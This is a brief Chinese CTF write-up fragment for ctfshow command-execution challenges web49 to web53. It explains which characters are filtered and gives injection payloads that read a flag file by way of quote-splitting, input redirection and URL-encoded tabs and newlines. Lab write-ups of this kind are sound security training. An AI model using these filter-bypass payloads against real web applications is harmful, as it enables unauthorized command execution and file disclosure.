ctfshow web入门命令执行web49-web53 1.web49 %被过滤了,所以&(%26)不能用了,反引号也被过滤了 payload: c=tac<>fla''g.php||c=tac<fla''g.php||c=nl<fla''g.php|| 2.web50 0x26是&的16进制,0x09是%09的16进制 payload: c=tac<>fla''g.php||c=tac<fla''g.php||c=nl<fla\g.php...
同web48 payload:?c=nl%09fl""ag.php%0a